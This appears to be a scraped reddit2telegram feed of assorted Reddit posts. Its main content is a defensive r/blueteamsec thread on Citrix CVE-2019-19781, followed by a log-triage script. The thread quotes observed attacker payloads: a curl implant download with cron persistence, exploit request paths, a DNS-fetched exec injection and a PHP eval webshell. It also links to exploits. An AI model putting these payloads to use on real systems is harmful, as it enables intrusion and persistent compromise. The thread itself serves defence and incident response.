Woke media strikes again 🤦‍♂️
7.1k upvotes
/r/OkBuddyFresca
2022 Aug 16
https://redd.it/wq92nc
by @r_okbuddyfresca
absolutelynotmeirl
41.6k upvotes
/r/absolutelynotme_irl
2019 Dec 31
https://redd.it/ehwhp1
by @notme_irl
They say that back then the year was 2020
3.0k upvotes
/r/Ratorix
2020 Sep 21
https://redd.it/iwwxtc
by @r_Ratorix
Directed by Robert B. Tikka
4.7k upvotes
/r/islam
2021 Jan 13
https://redd.it/kwlztz
by @r_islam_channel
#islam
Watson, Stone and Roberts Goddesses!
282 upvotes
/r/ChurchOfEmma
2021 Mar 01
https://redd.it/lv11db
by @r_churchofemma
First vs. Second Playthrough
8.6k upvotes
/r/DiscoElysium
2021 Apr 13
https://redd.it/mpsfre
by @r_DiscoElysium
#disco #discoelysium #hardcore #crpg #indiegames
Don't know if memes are allowed here but here it is
1.9k upvotes
/r/algotrading
2022 Jan 27
https://redd.it/sdmlw7
by @r_algotrading
#algorithmic #trading #trade #stock #market
META DO NOT POST TRACKING NUMBERS OR SLIPS
You'll potentially reveal both your address and the other person's address along with other identification. We just had incidents where the seller's address, seller's full name, seller's phone number, buyer's address, buyer's full name, and other package-specific information was leaked.
It's a mess to clean up, as other websites archive comments with links, and even after we take down the offending comment, we still have to contact image hosting sites with takedown requests. The posting of this message was delayed until said image hosting site took down the image.
Your post will be removed and other consequences will be handed down. Doxxing someone, intentionally or not, is a serious offense.
43 upvotes
/r/thinkpadsforsale
2020 Apr 16
https://redd.it/g2ngcl
by @rthinkpadsforsale
Multiple Exploits for CVE-2019-19781 (Citrix ADC/Netscaler) released overnight - prepare for mass exploitation
***Last update:*** January 20 - 07:01 UTC/GMT
**Patches Now Out for Some**
Updates to 11.1 (11.1 63.15) and 12.0 (12.0 63.13) are now up
Citrix blog post: [Vulnerability Update: First permanent fixes available, timeline accelerated](https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/?mkt_tok=eyJpIjoiT1RVME56UXhOak00WWpnMyIsInQiOiI0NG9GcjY4Z09OS3ZKT3BcL21odWp6V25EcmdFR3lwMVNBWmhqTjlpR1hmbzlRSlhIXC9BSXJyK0NNMk9SdEdFMkw4cUl5Mk9MVnBkY1JxSGJLZithVjh3PT0ifQ%3D%3D)
ADC version 12.0: [https://www.citrix.com/downloads/citrix-adc/firmware/release-120-build-6313.html](https://www.citrix.com/downloads/citrix-adc/firmware/release-120-build-6313.html)
ADC version 11.1: [https://www.citrix.com/downloads/citrix-adc/firmware/release-111-build-6315.html](https://www.citrix.com/downloads/citrix-adc/firmware/release-111-build-6315.html)
**Important**
Citrix issued revised updates today
* [https://www.citrix.com/blogs/2020/01/17/citrix-updates-on-citrix-adc-citrix-gateway-vulnerability/](https://www.citrix.com/blogs/2020/01/17/citrix-updates-on-citrix-adc-citrix-gateway-vulnerability/)
Fox-IT issued an analysis
* [https://resources.fox-it.com/rs/170-CAK-271/images/Fox-IT%20Advisory%20on%20Citrix%20vulnerability.pdf](https://resources.fox-it.com/rs/170-CAK-271/images/Fox-IT%20Advisory%20on%20Citrix%20vulnerability.pdf)
**Impact / Root Cause**
Remote pre-auth arbitrary command execution due to a logic vuln, i.e. reliable execution is possible.
**Products affected**
* Citrix ADC and Citrix Gateway version 13.0 all supported builds
* Citrix ADC and NetScaler Gateway version 12.1 all supported builds
* Citrix ADC and NetScaler Gateway version 12.0 all supported builds
* Citrix ADC and NetScaler Gateway version 11.1 all supported builds
* Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds
***Amazon Web Services*** *-* [https://twitter.com/KevTheHermit/status/1216318333219491840](https://twitter.com/KevTheHermit/status/1216318333219491840)
At midday on January 12th Citrix Netscaler AMIs on AWS are default vulnerable out of the box. The root password is set to the instance ID; that can be read from the metadata URL. You can also "cat /flash/nsconfig/.AWS/instance-id".
**Background on the vulnerability**
* [https://nvd.nist.gov/vuln/detail/CVE-2019-19781](https://nvd.nist.gov/vuln/detail/CVE-2019-19781)
* [https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-know/](https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-know/)
**Sigma rules**
* [https://github.com/Neo23x0/sigma/blob/master/rules/web/web\_citrix\_cve\_2019\_19781\_exploit.yml](https://github.com/Neo23x0/sigma/blob/master/rules/web/web_citrix_cve_2019_19781_exploit.yml)
**Snort rules**
* [https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+are+Public+and+Heavily+Used+Attempts+to+Install+Backdoor/25700/](https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+are+Public+and+Heavily+Used+Attempts+to+Install+Backdoor/25700/)
**Snort/Suricata rules**
* Present since December 29th - 2029206 - ET EXPLOIT Possible Citrix Application Delivery Controller Arbitrary Code Execution Attempt (CVE-2019-19781) (exploit.rules) in the EmergingThreats
* [https://rules.emergingthreats.net/open/](https://rules.emergingthreats.net/open/)
**Exploitation Forensic Artifacts**
* [https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/](https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/?utm_content=112033384&utm_medium=social&utm_source=twitter&hss_channel=tw-403811306)
* [https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+are+Public+and+Heavily+Used+Attempts+to+Install+Backdoor/25700/](https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+are+Public+and+Heavily+Used+Attempts+to+Install+Backdoor/25700/)
* [https://x1sec.com/CVE-2019-19781-DFIR](https://x1sec.com/CVE-2019-19781-DFIR)
* via SSH - [https://twitter.com/cyb3rops/status/1215974764227039238](https://twitter.com/cyb3rops/status/1215974764227039238) (caveat: .. doesn't need to be in the URL in all exploitation scenarios)

    ssh -t [address] 'grep -r "/../vpns" /var/log/http*'
**Vendor mitigation**
* [https://support.citrix.com/article/CTX267679](https://support.citrix.com/article/CTX267679)
* [https://support.citrix.com/article/CTX267027](https://support.citrix.com/article/CTX267027)
Citrix have now (8pm UTC Jan 11) published when they expect patched builds to be available - from [https://support.citrix.com/article/CTX267027](https://support.citrix.com/article/CTX267027) \- some are saying patches are available already to large clients
* 10.5 - 10.5.70.x - 31st January 2020
* 11.1 - 11.1.63.x - 20th January 2020
* 12.0 - 12.0.63.x - 20th January 2020
* 12.1 - 12.1.55.x - 27th January 2020
* 13.0 - 13.0.47.x - 27th January 2020
Citrix blog by their CISO - [https://www.citrix.com/blogs/2020/01/11/citrix-provides-update-on-citrix-adc-citrix-gateway-vulnerability/](https://www.citrix.com/blogs/2020/01/11/citrix-provides-update-on-citrix-adc-citrix-gateway-vulnerability/)
**3rd party mitigation steps / advice**
* [https://www.cyber.gov.au/threats/advisory-2020-001-active-exploitation-critical-vulnerability-citrix-application-delivery-controller-and-citrix-gateway](https://www.cyber.gov.au/threats/advisory-2020-001-active-exploitation-critical-vulnerability-citrix-application-delivery-controller-and-citrix-gateway)
* [https://medium.com/@hungrybytes/mitigation-steps-for-cve-2019-19781-8f88d48770b4](https://medium.com/@hungrybytes/mitigation-steps-for-cve-2019-19781-8f88d48770b4)
* Palo Alto content version 8224 or newer.
* 8224 contains detection code for this CVE and will reset the connection before the vulnerability can be exploited. Resets are visible in the threat logs with a name of "Citrix Application Delivery Controller And Gateway Directory Traversal Vulnerability".
* Fortinet IPS 15.754 has a signature - default action is 'pass' though
* [https://fortiguard.com/encyclopedia/ips/48653](https://fortiguard.com/encyclopedia/ips/48653)
* from the comments by [u/ragogumi](https://www.reddit.com/u/ragogumi/)
* "*Fortinet IPS sig appears to be ineffective at detecting or mitigating. I've seen nothing in IPS logs related to this CVE - and cisagov checker, nessus scans and 3rd party red team attempts have not triggered IPS sensor, regardless of remediation state.*"
* Checkpoint released IPS protection too, 2020-01-12, "Citrix Multiple Products Directory Traversal (CVE-2019-19781)". Default action seems to be "Detect".
* [https://www.checkpoint.com/defense/advisories/public/2019/CPAI-2019-1653.html](https://www.checkpoint.com/defense/advisories/public/2019/CPAI-2019-1653.html)
**Details on how to exploit**
* [https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/](https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/)
* [https://github.com/jas502n/CVE-2019-19781](https://github.com/jas502n/CVE-2019-19781)
**Checkers**
* [https://github.com/cisagov/check-cve-2019-19781](https://github.com/cisagov/check-cve-2019-19781) (USA Government)
* [https://github.com/mekoko/CVE-2019-19781](https://github.com/mekoko/CVE-2019-19781) (Chinese)
* [https://github.com/hackingyseguridad/nmap/blob/master/CVE-2019-19781.nse](https://github.com/hackingyseguridad/nmap/blob/master/CVE-2019-19781.nse) (nmap script)
* [https://github.com/cyberstruggle/DeltaGroup/blob/master/CVE-2019-19781/CVE-2019-19781.nse](https://github.com/cyberstruggle/DeltaGroup/blob/master/CVE-2019-19781/CVE-2019-19781.nse) (nmap script)
* [https://github.com/lasersharkkiller/noscripts/blob/master/exploits/scanner/cve-2019-19781-scanner.ps1](https://github.com/lasersharkkiller/noscripts/blob/master/exploits/scanner/cve-2019-19781-scanner.ps1) (PowerShell)
* [https://github.com/ptresearch/Pentest-Detections/tree/master/Citrix\_CVE-2019-19781](https://github.com/ptresearch/Pentest-Detections/tree/master/Citrix_CVE-2019-19781) (Russian - Windows Binary)
* [https://github.com/intrigueio/intrigue-core/blob/master/lib/tasks/vulns/citrix\_netscaler\_rce\_cve\_2019\_19781.rb](https://github.com/intrigueio/intrigue-core/blob/master/lib/tasks/vulns/citrix_netscaler_rce_cve_2019_19781.rb) Added to intrigue-core a week or so ago and then improved it when additional details came out by [u/jcran](https://www.reddit.com/u/jcran/)
* [https://medium.com/@securestep9/detecting-citrix-cve-2019-19781-with-owasp-nettacker-c460c5912c77](https://medium.com/@securestep9/detecting-citrix-cve-2019-19781-with-owasp-nettacker-c460c5912c77) OWASP's
* [https://github.com/x1sec/citrixmash\_scanner](https://github.com/x1sec/citrixmash_scanner)
**Commercial Checkers**
* [https://www.tenable.com/blog/cve-2019-19781-exploit-noscripts-for-remote-code-execution-vulnerability-in-citrix-adc-and](https://www.tenable.com/blog/cve-2019-19781-exploit-noscripts-for-remote-code-execution-vulnerability-in-citrix-adc-and) Tenable's
**Exploits**
* [https://github.com/projectzeroindia/CVE-2019-19781](https://github.com/projectzeroindia/CVE-2019-19781)
* [https://github.com/ianxtianxt/CVE-2019-19781](https://github.com/ianxtianxt/CVE-2019-19781)
* [https://github.com/trustedsec/cve-2019-19781/blob/master/citrixmash.py](https://github.com/trustedsec/cve-2019-19781/blob/master/citrixmash.py)
* [https://github.com/jas502n/CVE-2019-19781/blob/master/CVE-2019-19781.py](https://github.com/jas502n/CVE-2019-19781/blob/master/CVE-2019-19781.py)
* [https://github.com/rapid7/metasploit-framework/pull/12816/commits/50637d0d917a78f5eba5281f634df0af314d8d55](https://github.com/rapid7/metasploit-framework/pull/12816/commits/50637d0d917a78f5eba5281f634df0af314d8d55)
* [https://github.com/Jabo-SCO/Shitrix-CVE-2019-19781/blob/master/README.md](https://github.com/Jabo-SCO/Shitrix-CVE-2019-19781/blob/master/README.md)
* Exploitation possible with two GETs
* [https://twitter.com/mpgn\_x64/status/1216792205723041795](https://twitter.com/mpgn_x64/status/1216792205723041795)
* Exploitation possible without directory traversal
* [https://twitter.com/mpgn\_x64/status/1216802182760226817](https://twitter.com/mpgn_x64/status/1216802182760226817)
**Post Exploitation**
* [dozer.nz/citrix-decrypt/](https://t.co/xqCq1qHlp7?amp=1)
**Vulnerability Intelligence**
* [https://www.shodan.io/](https://www.shodan.io/) query: 'vuln:cve-2019-19781'
* [https://badpackets.net/over-25000-citrix-netscaler-endpoints-vulnerable-to-cve-2019-19781/](https://badpackets.net/over-25000-citrix-netscaler-endpoints-vulnerable-to-cve-2019-19781/) \- 25,000 endpoints vuln
* Alternate data sets as of 18:00 on the 12th suggest more
**Honeypot**
* [https://github.com/MalwareTech/CitrixHoneypot](https://github.com/MalwareTech/CitrixHoneypot)
**Exploitation Intelligence**
* Mass Scanning / Exploitation Observed on Jan 12th - [https://twitter.com/bad\_packets/status/1216291048185421830](https://twitter.com/bad_packets/status/1216291048185421830)
* Mass Exploitation Observed on Jan 10th - [https://twitter.com/bad\_packets/status/1215431625766424576](https://twitter.com/bad_packets/status/1215431625766424576)
* GreyNoise tagging - [https://twitter.com/GreyNoiseIO/status/1215818626055528453](https://twitter.com/GreyNoiseIO/status/1215818626055528453)
* [https://viz.greynoise.io/query/?gnql=cve%3Acve-2019-19781](https://viz.greynoise.io/query/?gnql=cve%3Acve-2019-19781)
* SANS honeypot uptick -
* 15:42 UTC Jan 11 - [https://twitter.com/sans\_isc/status/1216022602436808704](https://twitter.com/sans_isc/status/1216022602436808704)
* 4:46 UTC Jan 11 - [https://twitter.com/sans\_isc/status/1215857528749338624](https://twitter.com/sans_isc/status/1215857528749338624)
* Blog: [https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+are+Public+and+Heavily+Used+Attempts+to+Install+Backdoor/25700/](https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+are+Public+and+Heavily+Used+Attempts+to+Install+Backdoor/25700/)
* SANS observed payloads
* [https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+Overview+of+Observed+Payloads/25704/](https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+Overview+of+Observed+Payloads/25704/)
* SANS observe crypto miners on January 12th
* [https://twitter.com/sans\_isc/status/1216375320846176261](https://twitter.com/sans_isc/status/1216375320846176261)
* TrustedSec Honeypot analysis
* [https://www.trustedsec.com/blog/netscaler-honeypot/](https://www.trustedsec.com/blog/netscaler-honeypot/)
* AlienVault OTX pulse - [https://otx.alienvault.com/pulse/5e1c293e07c770f36d232489](https://otx.alienvault.com/pulse/5e1c293e07c770f36d232489)
* FireEye - [https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html](https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html)
* FireEye - NOTROBIN - [https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html](https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html)
* German Government [https://blog.dcso.de/a-curious-case-of-cve-2019-19781-palware-remove\_bds/](https://blog.dcso.de/a-curious-case-of-cve-2019-19781-palware-remove_bds/)
**Doozer Exploitation Intelligence**
[https://twitter.com/michel228/status/1216771783656910849](https://twitter.com/michel228/status/1216771783656910849)
Found this in the logs:

```
curl http://NN.NN.NN.NN:8081/2a9c665438cd0c8a9c4a25b2a6e0885f -o /tmp/.init/httpd; chmod 744 /tmp/.init/httpd; echo "* * * * * /var/nstmp/.nscache/httpd" | crontab -; /tmp/.init/httpd &"
```

Payload dropped hash (SHA256): 177c3d8389c71065c2ff2e74ab190486ade95869f6655a1e544f5ee41334517e
This is a 2MB implant written in Go - uses AES, persistence via Cron etc.
[u/undermyne](https://www.reddit.com/u/undermyne/) **Exploitation Intelligence**
*I just spent a few hours cleaning up an exploited VPX for a customer. As observed below, the ns.conf was compromised (copied and I assume the copy was grabbed). The passwd file was also taken (nothing of import in that one) and the personalbookmark.pl file was modified. Following cleanup there were 5 active processes running under nobody and one of them would automatically restart. To be safe I reverted to a backup from prior to the exploit being released. Patched and returned to service and all is well. If the bind logs indicate that a file was deleted you can find the deleted file in the /var/tmp/netscaler/portal/templates directory (or other relevant tmp folders). The XML files are your best bet at trying to figure out what was attempted. Thankfully the 9 attempts on the one I just fixed looked like they were basically trying to sort out what they could and couldn't do. Start with the httpaccess log, then use time stamps to search bind logs, and then see what was done with the xml.ttc2 files in the tmp folders.*
**NCC Group/Fox-IT Exploitation Intelligence**
* Actor 1, observed January 11th: we can see that exploiting this vulnerability has the following log patterns (where the filename is a random upper/lower-case alphabetic .xml). The attacker is observed using cron for persistence.
* Actor 1, observed January 12th, changed their payload to drop a binary called netscalerd, which is a coinminer
* [https://www.virustotal.com/gui/file/20343854b8c348146bf17fe739ce9028a620f93116438291f1b0b89345e18520/detection](https://www.virustotal.com/gui/file/20343854b8c348146bf17fe739ce9028a620f93116438291f1b0b89345e18520/detection)

```
POST /vpn/../vpns/portal/scripts/newbm.pl
GET /vpn/../vpns/portal/XIaoLBFveLyvUfUGiWAwElIJNERhpmrBM.xml
```

* Actor 2 observed January 13 around 15:30 UTC (not clear if someone is trolling)

```
./var/tmp/netscaler/portal/templates/REDACTED.xml.ttc2: $output .= $stash->get(['template', 0, 'new', [ { 'BLOCK' => 'exec(\'dig cmd.irannetworkteam.org txt|tee /var/vpn/themes/login.php | tee /netscaler/portal/templates/REDACTED.xml\');' } ]]);
```

for the domain

```
Domain Name: IRANNETWORKTEAM.ORG
Registry Domain ID: D402200000012341868-LROR
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: www.namesilo.com
Updated Date: 2020-01-11T14:17:00Z
Creation Date: 2020-01-11T13:46:37Z
```

the TXT record for the domain currently returns

```
> set querytype=TXT
> cmd.IRANNETWORKTEAM.ORG
Non-authoritative answer:
cmd.IRANNETWORKTEAM.ORG text = "<?php @eval(base64_decode(strrev(@$_POST[REDACTED])));?>"
```

So
* pull first stage from DNS TXT field
* uploads second/dynamic stage via POST in specific variable
This post is curated by the team at NCC Group/Fox-IT - [https://www.nccgroup.trust/](https://www.nccgroup.trust/uk/)
206 upvotes
/r/blueteamsec
2020 Jan 11
https://redd.it/en4m7j
by @r_blueteamsec
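
The triage order described in the post above (httpaccess log first, then the compiled .xml.ttc2 templates) can be scripted. This is an added example, not code from the post or from NCC Group/Fox-IT; the combined log format, the 10-minute pairing window, the function names and all sample lines are assumptions constructed for illustration.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import unquote

# Constructed sample data. The combined log format is an assumption about the
# httpaccess log layout; IPs are documentation ranges, file names are made up.
SAMPLE_LOG = """\
203.0.113.7 - - [11/Jan/2020:04:46:10 +0000] "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 200 143 "-" "curl/7.58.0"
198.51.100.9 - - [11/Jan/2020:04:46:11 +0000] "GET /vpn/index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [11/Jan/2020:04:46:12 +0000] "GET /vpn/../vpns/portal/AbCdEfGh.xml HTTP/1.1" 200 901 "-" "curl/7.58.0"
198.51.100.23 - - [12/Jan/2020:15:42:00 +0000] "POST /vpns/portal/scripts/newbm.pl HTTP/1.1" 200 143 "-" "python-requests/2.22"
198.51.100.23 - - [12/Jan/2020:15:42:03 +0000] "GET /vpns/portal/%58yZ.xml HTTP/1.1" 404 0 "-" "python-requests/2.22"
"""
SAMPLE_TTC2 = r"""$output .= $stash->get(['template', 0, 'new', [ { 'BLOCK' => 'exec(\'REDACTED-COMMAND\');' } ]]);
$output .= $stash->get(['title', 0]);
"""

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Match on the script and template names, not on "/../": the post notes that
# exploitation was also reported without directory traversal.
POST_RE = re.compile(r"/vpns/portal/scripts/newbm\.pl$")
XML_RE = re.compile(r"/vpns/portal/([^/]+\.xml)$")
BLOCK_RE = re.compile(r"'BLOCK'\s*=>\s*'((?:\\.|[^'\\])*)'")


def find_exploit_pairs(log_text, window=timedelta(minutes=10)):
    """Return GETs for a portal .xml that follow a newbm.pl POST from the same IP."""
    pending = {}  # client IP -> time of its most recent newbm.pl POST
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        when = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        # Drop the query string and decode %xx so encoded paths still match.
        path = unquote(m["path"].split("?", 1)[0])
        if m["method"] == "POST" and POST_RE.search(path):
            pending[m["ip"]] = when
            continue
        xml = XML_RE.search(path)
        if m["method"] == "GET" and xml and m["ip"] in pending:
            if when - pending[m["ip"]] <= window:
                hits.append({
                    "ip": m["ip"],
                    "time": when,              # use this to search the bind logs
                    "template": xml.group(1),  # look for <name>.ttc2 in the tmp folders
                    "status": int(m["status"]),
                    "traversal": "/../" in path,
                })
    return hits


def suspicious_blocks(ttc2_text):
    """Return BLOCK bodies in a compiled template that call exec() or system()."""
    found = []
    for m in BLOCK_RE.finditer(ttc2_text):
        body = m.group(1).replace("\\'", "'")
        if re.search(r"\b(?:exec|system)\s*\(", body):
            found.append(body)
    return found


if __name__ == "__main__":
    for hit in find_exploit_pairs(SAMPLE_LOG):
        print(hit)
    print(suspicious_blocks(SAMPLE_TTC2))
```
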
Live Betting - Live discussion for all your bets
237 upvotes
/r/SoccerBetting
2022 Dec 28
https://redd.it/zx4oro
by @rsoccerbetting
Jared, the man behind the famous South Park WoW cosplay has passed away due to Covid-19. RIP
https://www.youtube.com/watch?v=C3I4wpHshuw&ab_channel=mirrodin14
148.1k upvotes
/r/videos
2021 Jan 03
https://redd.it/kpw1i4
by @redditvideos
YouTube
Blizzcon 2013 The guy with no real life R.I.P. Jarod Nandin
How do you kill that which has no life? COVID apparently... I am saddened to hear he has passed.
I did not know him but will always fondly remember his cosplay.
Jarod Nandin 1981 - 2021 May he rest in peace.
🔥 This seal has reached peak level of chill
102.9k upvotes
/r/NatureIsFuckingLit
2021 Jun 03
https://redd.it/nrote1
by @NatureIsLit
Weekend news
🎉 Welcome to newly active channels: @indiandankmemesreddit, @r_RedDeadOnline, @reddit_infographic. 🎈🎈
🏆 Channel of the week: @r_persona5. Join and enjoy!
🔥 Hottest channels of the week: @r_combatfootage, @r_propagandaposters, @loliconsunite.
🙋
Q: How can I help?
A: Support us on Patreon and promote your favorite channels!
Q: How to make similar channels?
A: Ask at @r_channels or use manual at https://github.com/Fillll/reddit2telegram.
Q: Where to donate?
A: Patreon: https://www.patreon.com/reddit2telegram. Other ways: https://bit.ly/r2t_donate.
⬇️ All active channels:
01. @r_gifs
02. @r_jokes
03. @r_funny
04. @datascientology
05. @asiangirlsbeingcute
06. @r_behindthegifs
07. @pythondaily
08. @r_bitcoin
09. @RedditHistory
10. @news756
11. @r_pics_redux
12. @RedditCats
13. @r_til
14. @awwnime
15. @r_mlp
16. @ya_metro
17. @r_Showerthoughts
18. @r_me_irl
19. @r_dankmemes
20. @r_HighQualityGifs
21. @PoliticalHumor
22. @OldSchoolCool
23. @rddit
24. @denpasong
25. @reddit_all
26. @r_AskReddit
27. @r_explainmelikeimfive
28. @r_changemyview
29. @just_hmmm
30. @programmer_humor
31. @dailyfoodporn
32. @r_overwatch
33. @r_cryptocurrency
34. @r_listentothis
35. @r_ramen
36. @r_fantheories
37. @r_SlimeRancher
38. @r_googleplaydeals
39. @Indiancelebs
40. @r_pcmasterrace
41. @GIFFFs
42. @r_wow
43. @r_minecraft
44. @r_wholesomememes
45. @r_streetwear
46. @BetterEveryLoop
47. @reddit_fashion
48. @r_opensignups
49. @r_BigAnimeTiddies
50. @r_Damnthatsinteresting
51. @fakealbumcovers
52. @dash_cams
53. @r_mild
54. @r_porn
55. @r_formula1
56. @r_cpp
57. @r_gaming
58. @r_dontdeadopeninside
59. @r_linux
60. @reddit_android
61. @r_TechSupportGore
62. @r_indiaa
63. @r_dndgreentext
64. @r_dndmemes
65. @r_chemicalreactiongifs
66. @r_wheredidthesodago
67. @r_SwitchHacks
68. @r_books
69. @r_suggest
70. @r_space
71. @r_wasletztepreis
72. @r_greentext
73. @r_crappyoffbrands
74. @r_chemistry
75. @r_vim
76. @r_talesfromtechsupport
77. @r_PewdiepieSubmissions
78. @r_disneyvacation
79. @R_Punny
80. @r_mapporn
81. @r_softwaregore
82. @r_crappydesign
83. @r_comics
84. @r_remotejs
85. @streetmoe
86. @r_foxes
87. @r_digimon
88. @r_furry
89. @r_ik_ihe
90. @r_mildlyinfuriating
91. @r_Animemes
92. @r_wellthatsucks
93. @rtf2memes
94. @r_arma
95. @r_grandorder
96. @r_2meirl4meirl
97. @r_photoshopbattles
98. @r_pornhubcomments
99. @r_animeirl
100. @indepthstories
101. @r_osugame
102. @r_FreeGamesOnSteam
103. @reddit_cartoons
104. @r_technope
105. @rcarporn
106. @r_desktops
107. @r_vinyl
108. @r_creepy
109. @r_HentaiMemes
110. @rareinsults
111. @r_sbubby
112. @loliconsunite
113. @r_privacy
114. @r_WikiLeaks
115. @reddit_androiddev
116. @proceduralgeneration
117. @r_gtaonline
118. @ichimechtenleben
119. @IngressPrimeFeedback
120. @soccer_reddit
121. @r_reddevils
122. @NFL_reddit
123. @r_texans
124. @r_xxxtentacion
125. @r_quotesporn
126. @r_getmotivated
127. @r_Podcasts
128. @r_imaginary_network
129. @r_MaxEstLa
130. @r_SelfHosted
131. @r_InternetIsBeautiful
132. @r_thinkpadsforsale
133. @redditvideos
134. @rsoccerbetting
135. @r_xboxone
136. @LivestreamFail
137. @facepalmers
138. @r_ComedyCemetery
139. @r_latestagecapitalism
140. @ShitLiberalsSay
141. @redditpiracy
142. @r_ContraPoints
143. @IngressReddit
144. @YoutubeCompendium
145. @oddly_satisfy
146. @jenkinsci
147. @redditart
148. @r_interestingasfuck
149. @r_RimWorld
150. @r_woooosh
151. @instant_regret
152. @r_djs
153. @r_marvelstudios
154. @r_creepyasterisks
155. @AllTwitter
156. @r_TIHI
157. @r_therewasanattempt
158. @r_WatchPeopleDieInside
159. @r_youtubehaiku
160. @sub_eminem
161. @r_jailbreak
162. @reddit2telegram
163. @r_shittyramen
164. @bestoftweets
165. @blackpeopletweets
166. @whitepeopletweets
167. @r_trackers
168. @r_vault_hunters
169. @r_CoolGithubProjects
170. @r_evilbuildings
171. @r_linuxmemes
172. @r_BlackMagicFuckery
173. @Rattit
174. @r_engrish
175. @coolguides
176. @r_climbing
177. @r_climbingcirclejerk
178. @tyingherhairup
179. @r_designporn
180. @r_cricket
181. @r_LiverpoolFC
182. @r_econ
183. @r_animearmpits
184. @r_megane
185. @rSurrealMemes
186. @r_thinkpad
187. @r_apple
188. @r_funnystories
189. @r_shitposters_paradise
190. @r_nottheonion
191. @r_izlam
192. @GGPoE
193. @r_terraria
194. @r_breadtube
195. @r_war
196. @r_cutelittlefangs
197. @admeme
198. @r_channels_tifu
199. @r_vinesauce
200. @r_freegamefindings